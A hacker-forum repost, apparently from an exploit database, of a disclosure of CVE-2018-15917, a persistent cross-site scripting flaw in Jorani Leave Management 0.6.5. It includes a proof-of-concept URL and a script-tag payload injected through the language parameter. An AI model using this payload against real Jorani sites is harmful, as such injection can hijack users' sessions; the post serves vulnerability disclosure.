跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Jorani Leave Management 0.6.5 - Cross-Site Scripting

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Jorani Leave Management System 0.6.5 – Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-09-06
# Google Dork: N/A
# Vendor: Benjamin BALET
# Software Link: https://jorani.org/download.html
# Affected Version: 0.6.5 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-15917
  
# 1. Technical Description:
# Language parameter is vulnerable to Persistent Cross-Site Scripting (XSS) attacks through
# a GET request in which the values are stored in the user session.
  
# 2. Proof Of Concept (PoC):
# Go to http://localhost/session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-15917%27)%3C%2Fscript%3E&login=&CipheredValue=
 
# 3. Payload:
# en"><script>alert('PoC CVE-2018-15917')</script>

# 6. Reference:
# https://hackpuntes.com/cve-2018-15917-jorani-leave-management-system-0-6-5-cross-site-scripting-persistente/
# https://github.com/bbalet/jorani/issues/254

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。